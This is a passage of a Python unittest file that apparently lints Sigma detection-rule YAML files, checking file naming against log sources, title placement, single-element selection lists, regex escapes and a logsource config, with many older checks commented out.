\"firewall\":\n                                    pattern_prefix = \"net_firewall_\"\n                                elif value == \"webserver\":\n                                    pattern_prefix = \"web_\"\n                            elif key == \"service\":\n                                if value == \"auditd\":\n                                    pattern_prefix = \"lnx_auditd_\"\n                                elif value == \"modsecurity\":\n                                    pattern_prefix = \"modsec_\"\n                                elif value == \"diagnosis-scripted\":\n                                    pattern_prefix = \"win_diagnosis_scripted_\"\n                                elif value == \"firewall-as\":\n                                    pattern_prefix = \"win_firewall_as_\"\n                                elif value == \"msexchange-management\":\n                                    pattern_prefix = \"win_exchange_\"\n                                elif value == \"security\":\n                                    pattern_prefix = \"win_security_\"\n                                elif value == \"system\":\n                                    pattern_prefix = \"win_system_\"\n                                elif value == \"taskscheduler\":\n                                    pattern_prefix = \"win_taskscheduler_\"\n                                elif value == \"terminalservices-localsessionmanager\":\n                                    pattern_prefix = \"win_terminalservices_\"\n                                elif value == \"windefend\":\n                                    pattern_prefix = \"win_defender_\"\n                                elif value == \"wmi\":\n                                    pattern_prefix = \"win_wmi_\"\n                                elif value == \"codeintegrity-operational\":\n                                    pattern_prefix = \"win_codeintegrity_\"\n                                elif value == \"bits-client\":\n                                    pattern_prefix = \"win_bits_client_\"\n                                elif value == \"applocker\":\n                                    pattern_prefix = \"win_applocker_\"\n                                elif value == \"dns-server-analytic\":\n                                    pattern_prefix = \"win_dns_analytic_\"\n                                elif value == \"bitlocker\":\n                                    pattern_prefix = \"win_bitlocker_\"\n                                elif value == \"capi2\":\n                                    pattern_prefix = \"win_capi2_\"\n                                elif (\n                                    value\n                                    == \"certificateservicesclient-lifecycle-system\"\n                                ):\n                                    pattern_prefix = \"win_certificateservicesclient_lifecycle_system_\"\n                                elif value == \"pim\":\n                                    pattern_prefix = \"azure_pim_\"\n\n                    # This value is used to test if we should add the OS infix for certain categories\n                    if os_bool:\n                        pattern_prefix += os_infix\n                    if pattern_prefix != \"\":\n                        if not filename.startswith(pattern_prefix):\n                            for key, value in logsource.items():\n                                if key in [\"category\", \"service\", \"product\"]:\n                                    print(\n                                        Fore.YELLOW\n                                        + \"Rule {} has inconsistency between filename '{}' and logsource ({}: '{}'):\".format(\n                                            file, filename, key, value\n                                        )\n                                    )\n                            if file not in faulty_rules:\n                                faulty_rules.append(file)\n            name_lst.append(filename)\n\n        self.assertEqual(\n            faulty_rules,\n            [],\n            Fore.RED\n            + r\"There are rules with malformed file names (too short, too long, uppercase letters, a minus sign etc.). Please see the file names used in our repository and adjust your file names accordingly. The pattern for a valid file name is \\'[a-z0-9_]{10,90}\\.yml\\' and it has to contain at least an underline character. It also has to follow the following naming convention https://github.com/SigmaHQ/sigma-specification/blob/main/specification/sigma-rules-specification.md#yaml-file\",\n        )\n\n    # sigma cli sigmahq_title_caseIssue, sigmahq_title_endIssue, sigmahq_title_lengthIssue, sigmahq_title_startIssue\n    # def test_title(self):\n    #     faulty_rules = []\n    #     allowed_lowercase_words = [\n    #         \"the\",\n    #         \"for\",\n    #         \"in\",\n    #         \"with\",\n    #         \"via\",\n    #         \"on\",\n    #         \"to\",\n    #         \"without\",\n    #         \"of\",\n    #         \"through\",\n    #         \"from\",\n    #         \"by\",\n    #         \"as\",\n    #         \"a\",\n    #         \"or\",\n    #         \"at\",\n    #         \"and\",\n    #         \"an\",\n    #         \"over\",\n    #         \"new\",\n    #     ]\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         title = self.get_rule_part(file_path=file, part_name=\"title\")\n    #         if not title:\n    #             print(Fore.RED + \"Rule {} has no field 'title'.\".format(file))\n    #             faulty_rules.append(file)\n    #             continue\n    #         elif len(title) > 110:\n    #             print(\n    #                 Fore.YELLOW\n    #                 + \"Rule {} has a title field with too many characters (>110)\".format(\n    #                     file\n    #                 )\n    #             )\n    #             faulty_rules.append(file)\n    #         if title.startswith(\"Detects \"):\n    #             print(\n    #                 Fore.RED\n    #                 + \"Rule {} has a title that starts with 'Detects'\".format(file)\n    #             )\n    #             faulty_rules.append(file)\n    #         if title.endswith(\".\"):\n    #             print(Fore.RED + \"Rule {} has a title that ends with '.'\".format(file))\n    #             faulty_rules.append(file)\n    #         wrong_casing = []\n    #         for word in title.split(\" \"):\n    #             if (\n    #                 word.islower()\n    #                 and not word.lower() in allowed_lowercase_words\n    #                 and not \".\" in word\n    #                 and not \"/\" in word\n    #                 and not \"_\" in word\n    #                 and not word[0].isdigit()\n    #             ):\n    #                 wrong_casing.append(word)\n    #         if len(wrong_casing) > 0:\n    #             print(\n    #                 Fore.RED\n    #                 + \"Rule {} has a title that has not title capitalization. Words: '{}'\".format(\n    #                     file, \", \".join(wrong_casing)\n    #                 )\n    #             )\n    #             faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with non-conform 'title' fields. Please check: https://github.com/SigmaHQ/sigma/wiki/Rule-Creation-Guide#title\",\n    #     )\n\n    def test_title_in_first_line(self):\n        faulty_rules = []\n        for file in self.yield_next_rule_file_path(self.path_to_rules):\n            yaml = self.get_rule_yaml(file)\n\n            # skip multi-part yaml\n            if len(yaml) > 1:\n                continue\n\n            # this probably is not the best way to check whether\n            # title is the attribute given in the 1st line\n            # (also assumes dict keeps the order from the input file)\n            if list(yaml[0].keys())[0] != \"title\":\n                print(\n                    Fore.RED\n                    + \"Rule {} does not have its 'title' attribute in the first line\".format(\n                        file\n                    )\n                )\n                faulty_rules.append(file)\n\n        self.assertEqual(\n            faulty_rules,\n            [],\n            Fore.RED\n            + \"There are rules without the 'title' attribute in their first line.\",\n        )\n\n    def test_selection_list_one_value(self):\n        def treat_list(file, values, valid_, selection_name):\n            # rule with only list of Keywords term\n            if len(values) == 1 and not isinstance(values[0], str):\n                print(\n                    Fore.RED\n                    + \"Rule {} has the selection ({}) with a list of only 1 element in detection\".format(\n                        file, selection_name\n                    )\n                )\n                valid_ = False\n            elif isinstance(values[0], dict):\n                valid_ = treat_dict(file, values, valid_, selection_name)\n            return valid_\n\n        def treat_dict(file, values, valid_, selection_name):\n            if isinstance(values, list):\n                for dict_ in values:\n                    for key_ in dict_.keys():\n                        if isinstance(dict_[key_], list):\n                            if len(dict_[key_]) == 1:\n                                print(\n                                    Fore.RED\n                                    + \"Rule {} has the selection ({}/{}) with a list of only 1 value in detection\".format(\n                                        file, selection_name, key_\n                                    )\n                                )\n                                valid_ = False\n            else:\n                dict_ = values\n                for key_ in dict_.keys():\n                    if isinstance(dict_[key_], list):\n                        if len(dict_[key_]) == 1:\n                            print(\n                                Fore.RED\n                                + \"Rule {} has the selection ({}/{}) with a list of only 1 value in detection\".format(\n                                    file, selection_name, key_\n                                )\n                            )\n                            valid_ = False\n            return valid_\n\n        faulty_rules = []\n        for file in self.yield_next_rule_file_path(self.path_to_rules):\n            detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n            if detection:\n                valid = True\n                for key in detection:\n                    values = detection[key]\n                    if isinstance(detection[key], list):\n                        valid = treat_list(file, values, valid, key)\n\n                    if isinstance(detection[key], dict):\n                        valid = treat_dict(file, values, valid, key)\n\n                    if not valid:\n                        faulty_rules.append(file)\n\n        self.assertEqual(\n            faulty_rules,\n            [],\n            Fore.RED + \"There are rules using list with only 1 element\",\n        )\n\n    # simga cli SigmahqSigmacIssue\n    # def test_selection_start_or_and(self):\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n    #         if detection:\n    #             # This test is a best effort to avoid breaking SIGMAC parser. You could do more testing and try to fix this once and for all by modifying the token regular expressions https://github.com/SigmaHQ/sigma/blob/b9ae5303f12cda8eb6b5b90a32fd7f11ad65645d/tools/sigma/parser/condition.py#L107-L127\n    #             for key in detection:\n    #                 if key[:3].lower() == \"sel\":\n    #                     continue\n    #                 elif key[:2].lower() == \"or\":\n    #                     print(\n    #                         Fore.RED\n    #                         + \"Rule {} has a selection '{}' that starts with the string 'or'\".format(\n    #                             file, key\n    #                         )\n    #                     )\n    #                     faulty_rules.append(file)\n    #                 elif key[:3].lower() == \"and\":\n    #                     print(\n    #                         Fore.RED\n    #                         + \"Rule {} has a selection '{}' that starts with the string 'and'\".format(\n    #                             file, key\n    #                         )\n    #                     )\n    #                     faulty_rules.append(file)\n    #                 elif key[:3].lower() == \"not\":\n    #                     print(\n    #                         Fore.RED\n    #                         + \"Rule {} has a selection '{}' that starts with the string 'not'\".format(\n    #                             file, key\n    #                         )\n    #                     )\n    #                     faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with bad selection names. Can't start a selection name with an 'or*' or an 'and*' or a 'not*' \",\n    #     )\n\n    # sigma validator dangling_detection\n    # def test_unused_selection(self):\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n    #         condition = detection[\"condition\"]\n    #         wildcard_selections = re.compile(r\"\\sof\\s([\\w\\*]+)(?:$|\\s|\\))\")\n\n    #         # skip rules containing aggregations\n    #         if type(condition) == list:\n    #             continue\n\n    #         for selection in detection:\n    #             if selection == \"condition\":\n    #                 continue\n    #             if selection == \"timeframe\":\n    #                 continue\n\n    #             # remove special keywords\n    #             condition_list = (\n    #                 condition.replace(\"not \", \"\")\n    #                 .replace(\"1 of \", \"\")\n    #                 .replace(\"all of \", \"\")\n    #                 .replace(\" or \", \" \")\n    #                 .replace(\" and \", \" \")\n    #                 .replace(\"(\", \"\")\n    #                 .replace(\")\", \"\")\n    #                 .split(\" \")\n    #             )\n    #             if selection in condition_list:\n    #                 continue\n\n    #             # find all wildcards in condition\n    #             found = False\n    #             for wildcard_selection in wildcard_selections.findall(condition):\n    #                 # wildcard matches selection\n    #                 if (\n    #                     re.search(wildcard_selection.replace(r\"*\", r\".*\"), selection)\n    #                     is not None\n    #                 ):\n    #                     found = True\n    #                     break\n    #             # selection was not found in condition\n    #             if not found:\n    #                 print(\n    #                     Fore.RED\n    #                     + \"Rule {} has an unused selection '{}'\".format(file, selection)\n    #                 )\n    #                 faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules, [], Fore.RED + \"There are rules with unused selections\"\n    #     )\n\n    # sigma cli SigmahqInvalidAllModifierIssue\n    # def test_all_value_modifier_single_item(self):\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n    #         if detection:\n    #             for search_identifier in detection:\n    #                 if isinstance(detection[search_identifier], dict):\n    #                     for field in detection[search_identifier]:\n    #                         if \"|all\" in field and not isinstance(\n    #                             detection[search_identifier][field], list\n    #                         ):\n    #                             print(\n    #                                 Fore.RED\n    #                                 + \"Rule {} uses the 'all' modifier on a single item in selection ({}/{})\".format(\n    #                                     file, search_identifier, field\n    #                                 )\n    #                             )\n    #                             faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with |all modifier only having one item. \"\n    #         + \"Single item values are not allowed to have an all modifier as some back-ends cannot support it. \"\n    #         + \"If you use it as a workaround to duplicate a field in a selection, use a new selection instead.\",\n    #     )\n\n    # sigma cli SigmahqFieldUserIssue\n    # def test_field_user_localization(self):\n    #     def checkUser(faulty_rules, dict):\n    #         for key, value in dict.items():\n    #             if \"User\" in key:\n    #                 if type(value) == str:\n    #                     if \"AUTORI\" in value or \"AUTHORI\" in value:\n    #                         print(\"Localized user name '{}'.\".format(value))\n    #                         faulty_rules.append(file)\n\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n    #         for sel_key, sel_value in detection.items():\n    #             if sel_key == \"condition\" or sel_key == \"timeframe\":\n    #                 continue\n    #             # single item selection\n    #             if type(sel_value) == dict:\n    #                 checkUser(faulty_rules, sel_value)\n    #             if type(sel_value) == list:\n    #                 # skip keyword selection\n    #                 if type(sel_value[0]) != dict:\n    #                     continue\n    #                 # multiple item selection\n    #                 for item in sel_value:\n    #                     checkUser(faulty_rules, item)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules that match using localized user accounts. Better employ a generic version such as:\\n\"\n    #         + \"User|contains: # covers many language settings\\n\"\n    #         + \"    - 'AUTHORI'\\n\"\n    #         + \"    - 'AUTORI'\",\n    #     )\n\n    # sigma condition error\n    # def test_condition_operator_casesensitive(self):\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n    #         if detection:\n    #             valid = True\n    #             if isinstance(detection[\"condition\"], str):\n    #                 param = detection[\"condition\"].split(\" \")\n    #                 for item in param:\n    #                     if item.lower() == \"or\" and not item == \"or\":\n    #                         valid = False\n    #                     elif item.lower() == \"and\" and not item == \"and\":\n    #                         valid = False\n    #                     elif item.lower() == \"not\" and not item == \"not\":\n    #                         valid = False\n    #                     elif item.lower() == \"of\" and not item == \"of\":\n    #                         valid = False\n    #                 if not valid:\n    #                     print(\n    #                         Fore.RED\n    #                         + \"Rule {} has a invalid condition '{}' : 'or','and','not','of' are lowercase\".format(\n    #                             file, detection[\"condition\"]\n    #                         )\n    #                     )\n    #                     faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED + \"There are rules using condition without lowercase operator\",\n    #     )\n\n    def test_broken_thor_logsource_config(self):\n        faulty_config = False\n\n        # This test check of the \"thor.yml\" config file has a missing \"WinEventLog:\" prefix in Windows log sources\n        path_to_thor_config = \"tests/thor.yml\"\n        try:\n            path_to_thor_config = os.path.join(\n                os.path.dirname(os.path.realpath(__file__)), path_to_thor_config\n            )\n            thor_logsources = self.get_rule_yaml(path_to_thor_config)[0][\"logsources\"]\n\n            for key, value in thor_logsources.items():\n                try:\n                    if value[\"product\"] == \"windows\":\n                        sources_list = value[\"sources\"]\n                        for i in sources_list:\n                            if not i.startswith(\"WinEventLog:\"):\n                                faulty_config = True\n                                print(\n                                    Fore.RED\n                                    + \"/tests/thor.yml config file has a broken source. Windows Eventlog sources must start with the keyword 'WinEventLog:'\"\n                                )\n                except:\n                    pass\n            self.assertEqual(\n                faulty_config,\n                False,\n                Fore.RED\n                + \"thor.yml configuration file located in 'tests/thor.yml' has a borken log source definition\",\n            )\n        except:\n            self.assertEqual(\n                faulty_config,\n                False,\n                Fore.RED\n                + \"thor.yml configuration file was not found. Please make sure to run the script from the root of the sigma folder\",\n            )\n\n    def test_re_invalid_escapes(self):\n        faulty_rules = []\n        MAX_DEPTH = 3\n\n        def create_escape_allow_list():\n            \"\"\"\n            Create a list of characters that are allowed to be escaped.\n            1. Based on string.punctuation chars that would already be escaped by re.escape()\n            2. Followed by special chars like '\\n', '\\t', '\\[0-9]' etc.\n            3. Followed by Double- or Single Quote to escape string literals.\n            \"\"\"\n            allowed_2_be_escaped = []\n            index = 0\n            l = tuple(re.escape(string.punctuation))\n            for c in l:\n                if c == \"\\\\\":\n                    allowed_2_be_escaped.append(l[index + 1])\n                index += 1\n\n            re_specials = [\n                \"A\",\n                \"b\",\n                \"B\",\n                \"d\",\n                \"D\",\n                \"f\",\n                \"n\",\n                \"r\",\n                \"s\",\n                \"S\",\n                \"t\",\n                \"v\",\n                \"w\",\n                \"W\",\n                \"Z\",\n                # Match Groups\n                \"0\",\n                \"1\",\n                \"2\",\n                \"3\",\n                \"4\",\n                \"5\",\n                \"6\",\n                \"7\",\n                \"8\",\n                \"9\",\n            ]\n            allowed_2_be_escaped.extend(re_specials)\n\n            allowed_2_be_escaped.extend(\n                [\n                    '\"',\n                    \"'\",\n                ]\n            )\n\n            return allowed_2_be_escaped\n\n        def check_list_or_recurse_on_dict(item, depth: int, special: bool) -> None:\n            \"\"\"\n            Recursive walk through the detection to find \"|re\" occurance.\n            Jump to check_item_for_bad_escapes with lists or strings found.\n            \"\"\"\n            if type(item) == list:\n                pass\n                # check_item_for_bad_escapes(item)\n            elif type(item) == dict and depth <= MAX_DEPTH:\n                for keys, sub_item in item.items():\n                    if (\n                        \"|re\" in keys\n                    ):  # Covers both \"base64\" and \"base64offset\" modifiers\n                        if type(sub_item) == str or type(sub_item) == list:\n                            check_item_for_bad_escapes(sub_item)\n                        else:\n                            check_list_or_recurse_on_dict(sub_item, depth + 1, True)\n                    else:\n                        check_list_or_recurse_on_dict(sub_item, depth + 1, special)\n\n        def check_item_for_bad_escapes(item):\n            \"\"\"\n            Check item against bad escaped characters\n            \"\"\"\n            found_bad_escapes = []\n            to_check = []\n            if type(item) == str:\n                to_check.append(item)\n            else:\n                to_check = item\n            for str_item in to_check:\n                l = tuple(str_item)\n                index = 0\n                for c in l:\n                    if c == \"\\\\\":\n                        # 'l[index-1] != \"\\\\\"' ---> Allows \"\\\\\\\\\"\n                        # Check if character after \\ is not in escape_allow_list and also not already found\n                        if (\n                            l[index - 1] != \"\\\\\"\n                            and l[index + 1] not in escape_allow_list\n                            and l[index + 1] not in found_bad_escapes\n                        ):\n                            # Only for debugging:\n                            # print(f\"Illegal escape found {c}{l[index+1]}\")\n                            found_bad_escapes.append(f\"{l[index+1]}\")\n                    index += 1\n\n            if len(found_bad_escapes) > 0:\n                print(\n                    Fore.RED\n                    + \"Rule {} has forbidden escapes in |re '{}'\".format(\n                        file, \",\".join(found_bad_escapes)\n                    )\n                )\n                faulty_rules.append(file)\n\n        # Create escape_allow_list for this test\n        escape_allow_list = create_escape_allow_list()\n\n        # For each rule file, extract detection and dive into recursion\n        for file in self.yield_next_rule_file_path(self.path_to_rules):\n            detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n            if detection:\n                check_list_or_recurse_on_dict(detection, 1, False)\n\n        self.assertEqual(\n            faulty_rules, [], Fore.RED + \"There are rules using illegal re-escapes\"\n        )\n\n    # def test_confirm_extension_is_yml(self):\n    # files_with_incorrect_extensions = []\n\n    # for file in self.yield_next_rule_file_path(self.path_to_rules):\n    # file_name_and_extension = os.path.splitext(file)\n    # if len(file_name_and_extension) == 2:\n    # extension = file_name_and_extension[1]\n    # if extension != \".yml\":\n    # files_with_incorrect_extensions.append(file)\n\n    # self.assertEqual(files_with_incorrect_extensions, [], Fore.RED +\n    # \"There are rule files with extensions other than .yml\")\n    # sigma-cli validators attacktag\n    # def test_confirm_correct_mitre_tags(self):\n    #     files_with_incorrect_mitre_tags = []\n\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         tags = self.get_rule_part(file_path=file, part_name=\"tags\")\n    #         if tags:\n    #             for tag in tags:\n    #                 if tag.startswith(\"attack.\") and tag not in self.MITRE_ALL:\n    #                     print(\n    #                         Fore.RED\n    #                         + \"Rule {} has the following incorrect MITRE tag {}\".format(\n    #                             file, tag\n    #                         )\n    #                     )\n    #                     files_with_incorrect_mitre_tags.append(file)\n\n    #     self.assertEqual(\n    #         files_with_incorrect_mitre_tags,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with incorrect/unknown MITRE Tags. (please inform us about new tags that are not yet supported in our tests) and check the correct tags here: https://attack.mitre.org/ \",\n    #     )\n\n    # sigma validators duplicate_tag\n    # def test_duplicate_tags(self):\n    #     files_with_incorrect_mitre_tags = []\n\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         tags = self.get_rule_part(file_path=file, part_name=\"tags\")\n    #         if tags:\n    #             known_tags = []\n    #             for tag in tags:\n    #                 if tag in known_tags:\n    #                     print(\n    #                         Fore.RED\n    #                         + \"Rule {} has the duplicate tag {}\".format(file, tag)\n    #                     )\n    #                     files_with_incorrect_mitre_tags.append(file)\n    #                 else:\n    #                     known_tags.append(tag)\n\n    #     self.assertEqual(\n    #         files_with_incorrect_mitre_tags,\n    #         [],\n    #         Fore.RED + \"There are rules with duplicate tags\",\n    #     )\n\n    #  sigma validators duplicate_references\n    # def test_duplicate_references(self):\n    #     files_with_duplicate_references = []\n\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         references = self.get_rule_part(file_path=file, part_name=\"references\")\n    #         if references:\n    #             known_references = []\n    #             for reference in references:\n    #                 if reference in known_references:\n    #                     print(\n    #                         Fore.RED\n    #                         + \"Rule {} has the duplicate reference {}\".format(\n    #                             file, reference\n    #                         )\n    #                     )\n    #                     files_with_duplicate_references.append(file)\n    #                 else:\n    #                     known_references.append(reference)\n\n    #     self.assertEqual(\n    #         files_with_duplicate_references,\n    #         [],\n    #         Fore.RED + \"There are rules with duplicate references\",\n    #     )\n\n    # sigma validator identifier_existence identifier_uniqueness\n    # def test_missing_id(self):\n    #     faulty_rules = []\n    #     dict_id = {}\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         id = self.get_rule_part(file_path=file, part_name=\"id\")\n    #         if not id:\n    #             print(Fore.YELLOW + \"Rule {} has no field 'id'.\".format(file))\n    #             faulty_rules.append(file)\n    #         elif len(id) != 36:\n    #             print(\n    #                 Fore.YELLOW\n    #                 + \"Rule {} has a malformed 'id' (not 36 chars).\".format(file)\n    #             )\n    #             faulty_rules.append(file)\n    #         elif id.lower() in dict_id.keys():\n    #             print(\n    #                 Fore.YELLOW\n    #                 + \"Rule {} has the same 'id' as {}. Ids have to be unique.\".format(\n    #                     file, dict_id[id]\n    #                 )\n    #             )\n    #             faulty_rules.append(file)\n    #         else:\n    #             dict_id[id.lower()] = file\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with missing or malformed 'id' fields. Generate an id (e.g. here: https://www.uuidgenerator.net/version4) and add it to the reported rule(s).\",\n    #     )\n    # sigma-cli error\n    # def test_optional_date_modified(self):\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         modifiedfield = self.get_rule_part(file_path=file, part_name=\"modified\")\n    #         if modifiedfield:\n    #             if not isinstance(modifiedfield, str):\n    #                 print(\n    #                     Fore.YELLOW\n    #                     + \"Rule {} has a malformed 'modified' (should be YYYY/MM/DD).\".format(\n    #                         file\n    #                     )\n    #                 )\n    #                 faulty_rules.append(file)\n    #             elif len(modifiedfield) != 10:\n    #                 print(\n    #                     Fore.YELLOW\n    #                     + \"Rule {} has a malformed 'modified' (not 10 chars, should be YYYY/MM/DD).\".format(\n    #                         file\n    #                     )\n    #                 )\n    #                 faulty_rules.append(file)\n    #             elif modifiedfield[4] != \"/\" or modifiedfield[7] != \"/\":\n    #                 print(\n    #                     Fore.YELLOW\n    #                     + \"Rule {} has a malformed 'modified' (should be YYYY/MM/DD).\".format(\n    #                         file\n    #                     )\n    #                 )\n    #                 faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with malformed 'modified' fields. (create one, e.g. date: 2019-01-14)\",\n    #     )\n\n    # sigma-cli error and validator status_existence status_unsupported\n    # def test_optional_status(self):\n    #     faulty_rules = []\n    #     valid_status = [\"stable\", \"test\", \"experimental\", \"deprecated\", \"unsupported\"]\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         status_str = self.get_rule_part(file_path=file, part_name=\"status\")\n    #         if status_str:\n    #             if not status_str in valid_status:\n    #                 print(\n    #                     Fore.YELLOW\n    #                     + \"Rule {} has a invalid 'status' (check wiki).\".format(file)\n    #                 )\n    #                 faulty_rules.append(file)\n    #             elif status_str == \"unsupported\":\n    #                 print(\n    #                     Fore.YELLOW\n    #                     + \"Rule {} has the unsupported 'status', can not be in rules directory\".format(\n    #                         file\n    #                     )\n    #                 )\n    #                 faulty_rules.append(file)\n    #         else:\n    #             print(\n    #                 Fore.YELLOW + \"Rule {} is missing the 'status' field\".format(file)\n    #             )\n    #             faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with malformed or missing 'status' fields. (check https://github.com/SigmaHQ/sigma-specification)\",\n    #     )\n\n    # Sigma validator all_of_them_condition\n    # def test_all_of_them_condition(self):\n    #     faulty_detections = []\n\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n\n    #         if \"all of them\" in detection[\"condition\"]:\n    #             faulty_detections.append(file)\n\n    #     self.assertEqual(\n    #         faulty_detections,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules using 'all of them'. Better use e.g. 'all of selection*' instead (and use the 'selection_' prefix as search-identifier).\",\n    #     )\n\n    # sigma-cli validators tlptag\n    # def test_optional_tlp(self):\n    #     faulty_rules = []\n    #     valid_tlp = [\n    #         \"WHITE\",\n    #         \"GREEN\",\n    #         \"AMBER\",\n    #         \"RED\",\n    #     ]\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         tlp_str = self.get_rule_part(file_path=file, part_name=\"tlp\")\n    #         if tlp_str:\n    #             # it exists but isn't a string\n    #             if not isinstance(tlp_str, str):\n    #                 print(\n    #                     Fore.YELLOW\n    #                     + \"Rule {} has a 'tlp' field that isn't a string.\".format(file)\n    #                 )\n    #                 faulty_rules.append(file)\n    #             elif not tlp_str.upper() in valid_tlp:\n    #                 print(\n    #                     Fore.YELLOW\n    #                     + \"Rule {} has a 'tlp' field with not valid value.\".format(file)\n    #                 )\n    #                 faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with malformed optional 'tlp' fields. (https://www.cisa.gov/tlp)\",\n    #     )\n\n    # Not in the specification\n    # def test_optional_target(self):\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         target = self.get_rule_part(file_path=file, part_name=\"target\")\n    #         if target:\n    #             # it exists but isn't a list\n    #             if not isinstance(target, list):\n    #                 print(\n    #                     Fore.YELLOW\n    #                     + \"Rule {} has a 'target' field that isn't a list.\".format(file)\n    #                 )\n    #                 faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with malformed 'target' fields. (has to be a list of values even if it contains only a single value)\",\n    #     )\n    # sigma validators duplicate_title\n    # def test_duplicate_titles(self):\n    #     # This test ensure that every rule has a unique title\n    #     faulty_rules = []\n    #     titles_dict = {}\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         title = (\n    #             self.get_rule_part(file_path=file, part_name=\"title\").lower().rstrip()\n    #         )\n    #         duplicate = False\n    #         for rule, title_ in titles_dict.items():\n    #             if title == title_:\n    #                 print(\n    #                     Fore.RED\n    #                     + \"Rule {} has an already used title in {}.\".format(file, rule)\n    #                 )\n    #                 duplicate = True\n    #                 faulty_rules.append(file)\n    #                 continue\n    #         if not duplicate:\n    #             titles_dict[file] = title\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules that share the same 'title'. Please check: https://github.com/SigmaHQ/sigma/wiki/Rule-Creation-Guide#title\",\n    #     )\n\n    # def test_invalid_logsource_attributes(self):\n    #     faulty_rules = []\n    #     valid_logsource = [\n    #         'category',\n    #         'product',\n    #         'service',\n    #         'definition',\n    #     ]\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         logsource = self.get_rule_part(\n    #             file_path=file, part_name=\"logsource\")\n    #         if not logsource:\n    #             print(Fore.RED + \"Rule {} has no 'logsource'.\".format(file))\n    #             faulty_rules.append(file)\n    #             continue\n    #         valid = True\n    #         for key in logsource:\n    #             if key.lower() not in valid_logsource:\n    #                 print(\n    #                     Fore.RED + \"Rule {} has a logsource with an invalid field ({})\".format(file, key))\n    #                 valid = False\n    #             elif not isinstance(logsource[key], str):\n    #                 print(\n    #                     Fore.RED + \"Rule {} has a logsource with an invalid field type ({})\".format(file, key))\n    #                 valid = False\n    #         if not valid:\n    #             faulty_rules.append(file)\n\n    #     self.assertEqual(faulty_rules, [], Fore.RED +\n    #                      \"There are rules with non-conform 'logsource' fields. Please check: https://github.com/SigmaHQ/sigma/wiki/Rule-Creation-Guide#log-source\")\n    # def test_field_name_typo(self):\n    #     # add \"OriginalFilename\" after Aurora switched to SourceFilename\n    #     # add \"ProviderName\" after special case powershell classic is resolved\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         # typos is a list of tuples where each tuple contains (\"The typo\", \"The correct version\")\n    #         typos = [(\"ServiceFilename\", \"ServiceFileName\"), (\"TargetFileName\", \"TargetFilename\"), (\"SourceFileName\", \"OriginalFileName\"), (\"Commandline\", \"CommandLine\"), (\"Targetobject\", \"TargetObject\"), (\"OriginalName\", \"OriginalFileName\"), (\"ImageFileName\", \"OriginalFileName\"), (\"details\", \"Details\")]\n    #         # Some fields exists in certain log sources in different forms than other log sources. We need to handle these as special cases\n    #         # We check first the logsource to handle special cases\n    #         logsource = self.get_rule_part(file_path=file, part_name=\"logsource\").values()\n    #         # add more typos in specific logsources below\n    #         if \"windefend\" in logsource:\n    #             typos += [(\"New_Value\", \"NewValue\"), (\"Old_Value\", \"OldValue\"), ('Source_Name', 'SourceName'), (\"Newvalue\", \"NewValue\"), (\"Oldvalue\", \"OldValue\"), ('Sourcename', 'SourceName')]\n    #         elif \"registry_set\" in logsource or \"registry_add\" in logsource or \"registry_event\" in logsource:\n    #             typos += [(\"Targetobject\", \"TargetObject\"), (\"Eventtype\", \"EventType\"), (\"Newname\", \"NewName\")]\n    #         elif \"process_creation\" in logsource:\n    #             typos += [(\"Parentimage\", \"ParentImage\"), (\"Integritylevel\", \"IntegrityLevel\"), 